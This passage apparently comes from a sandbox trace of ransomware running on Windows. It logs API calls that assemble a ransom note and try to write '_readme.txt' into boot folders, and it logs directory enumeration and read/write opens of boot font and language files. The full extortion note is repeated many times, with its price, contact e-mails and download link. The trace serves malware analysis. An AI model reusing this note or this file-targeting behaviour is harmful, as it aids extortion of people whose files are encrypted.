files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.957] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.957] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.957] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.957] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.957] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.957] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0165.957] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.957] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.957] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.957] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0165.958] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.958] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.958] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0165.958] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.958] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.958] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.959] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0165.959] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.959] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0165.959] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.959] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.959] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0165.959] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.959] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0165.959] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.959] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.959] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0165.959] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.959] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0165.959] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.959] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.960] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.960] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.960] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0165.960] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.960] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.960] PathFindFileNameW (pszPath="") returned="" [0165.960] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.961] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.961] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.961] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.961] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.961] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.961] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.961] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0165.961] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0165.961] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.961] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.961] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.961] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.962] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.962] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.962] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.962] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0165.962] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.962] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.962] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.962] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.962] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.962] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 